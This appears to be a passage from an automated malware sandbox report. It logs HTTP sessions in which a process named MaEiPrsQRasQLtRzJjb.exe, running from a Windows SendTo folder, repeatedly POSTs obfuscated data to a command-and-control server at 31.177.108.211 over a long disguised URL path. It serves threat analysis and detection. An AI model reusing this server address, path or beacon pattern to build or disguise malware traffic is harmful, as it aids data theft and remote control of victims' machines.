                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          89          192.168.2.4  56759        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:59.081767082 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:59.427350998 CEST  2532  OUT  Data Raw: 5b 53 43 50 55 44 59 52 59 5f 51 51 52 5d 54 54 5a 5e 5a 5d 55 57 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [SCPUDYRY_QQR]TTZ^Z]UWSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+&Y T!##=*)+%Y+(0),>]$7&#2?%+9[&!^-3
                                          Sep 13, 2024 21:03:59.835443974 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:59.988482952 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:59 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          90          192.168.2.4  56760        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:04:00.121438026 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:00.473117113 CEST  2532  OUT  Data Raw: 5b 56 43 57 55 43 5c 57 59 5f 51 51 52 5c 54 5b 5a 52 5a 5f 55 57 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VCWUC\WY_QQR\T[ZRZ_UWSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+ ")Y #.(8&?,&);8<"]0#,1:#1(Y%9[&!^-7


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          91          192.168.2.4  56761        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:04:00.791816950 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:01.145128965 CEST  2108  OUT  Data Raw: 5b 51 43 54 50 40 59 57 59 5f 51 51 52 50 54 50 5a 5f 5a 51 55 52 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QCTP@YWY_QQRPTPZ_ZQURS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9D+/6]41)7-[)(2R+=Y>(007%*$%(Y2+9[&!^-
                                          Sep 13, 2024 21:04:01.555558920 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:01.709896088 CEST  349  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0c 3c 36 3b 55 30 2b 2f 55 38 5b 2e 57 33 2f 3c 5c 3c 23 08 1a 28 03 3c 1e 2e 04 3d 06 27 15 25 5c 33 3f 3f 58 24 59 33 19 29 2a 2e 46 0d 1d 25 58 2a 2c 20 1f 3e 3e 24 1e 24 58 22 00 23 20 2b 16 24 59 3f 54 37 3c 08 1f 23 31 3f 1c 26 2a 2a 01 2c 36 2e 15 3d 0f 00 5b 37 36 2e 55 0f 15 3a 08 31 08 22 51 3f 0b 24 01 3e 3c 2a 1f 32 2f 24 0e 32 38 34 56 24 01 3a 1d 25 59 29 1f 27 31 33 13 2b 5b 3a 0d 35 21 22 57 22 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:<6;U0+/U8[.W3/<\<#(<.='%\3??X$Y3)*.F%X*, >>$$X"# +$Y?T7<#1?&**,6.=[76.U:1"Q?$><*2/$284V$:%Y)'13+[:5!"W"'T#(V3YT0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          92          192.168.2.4  56762        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:04:00.934387922 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:01.285552025 CEST  2528  OUT  Data Raw: 5b 57 46 53 55 41 5c 56 59 5f 51 51 52 59 54 5a 5a 52 5a 59 55 5f 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WFSUA\VY_QQRYTZZRZYU_SDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9*<*46#*>6U?<*+8'(?='3W29;$,([1;9[&!^-
                                          Sep 13, 2024 21:04:01.679404974 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:01.842885017 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          93          192.168.2.4  56763        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:04:02.264465094 CEST  554  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:02.613761902 CEST  2532  OUT  Data Raw: 5b 57 46 54 55 47 59 54 59 5f 51 51 52 50 54 54 5a 52 5a 51 55 56 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WFTUGYTY_QQRPTTZRZQUVSGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<42&70)[((&U=,=Z=^8V<*%0 &?1< 19[&!^-
                                          Sep 13, 2024 21:04:03.026252031 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:03.184693098 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:03 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          94          192.168.2.4  56764        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:04:03.304160118 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:03.660779953 CEST  2532  OUT  Data Raw: 5e 52 46 52 55 46 59 56 59 5f 51 51 52 51 54 55 5a 5d 5a 5e 55 51 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RFRUFYVY_QQRQTUZ]Z^UQSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+?&#Y75)5?,=Y>; P??)33 V&'E&'19[&!^-
                                          Sep 13, 2024 21:04:04.047297955 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:04.201162100 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:04 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          95 | 192.168.2.4 | 56765 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:04.336846113 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:04.692369938 CEST | 2532 | OUT
                                          Sep 13, 2024 21:04:05.114929914 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:05.250639915 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:04 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          96 | 192.168.2.4 | 56766 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:05.457201004 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:05.801414013 CEST | 2532 | OUT
                                          Sep 13, 2024 21:04:06.371005058 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:06.371572971 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:04:06.371654987 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          97 | 192.168.2.4 | 56767 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:06.490175962 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          98 | 192.168.2.4 | 56768 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:06.730335951 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:07.082417011 CEST | 2108 | OUT
                                          Sep 13, 2024 21:04:07.537321091 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:07.698426008 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:07 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          99 | 192.168.2.4 | 56769 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:06.873327017 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:07.223083973 CEST | 2532 | OUT
                                          Sep 13, 2024 21:04:07.663408041 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:07.794451952 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:07 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          100 | 192.168.2.4 | 56770 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:07.929236889 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:08.285631895 CEST | 2532 | OUT
                                          Sep 13, 2024 21:04:08.670831919 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:08.809427977 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:08 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          101 | 192.168.2.4 | 56771 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:08.925497055 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:09.270024061 CEST | 2532 | OUT
                                          Sep 13, 2024 21:04:09.666467905 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:09.820348024 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:09 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          102 | 192.168.2.4 | 56772 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:09.949070930 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:10.301253080 CEST | 2532 | OUT
                                          Sep 13, 2024 21:04:10.722986937 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:10.879101038 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:10 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          103 | 192.168.2.4 | 56773 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:11.006936073 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:11.363893032 CEST | 2532 | OUT
                                          Sep 13, 2024 21:04:11.676259995 CEST | 1236 | OUT
                                          Sep 13, 2024 21:04:12.285602093 CEST | 1236 | OUT
                                          Sep 13, 2024 21:04:12.346925020 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:12.347040892 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:12.347305059 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:12.349998951 CEST | 1296 | OUT


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          104 | 192.168.2.4 | 56774 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:12.719120979 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
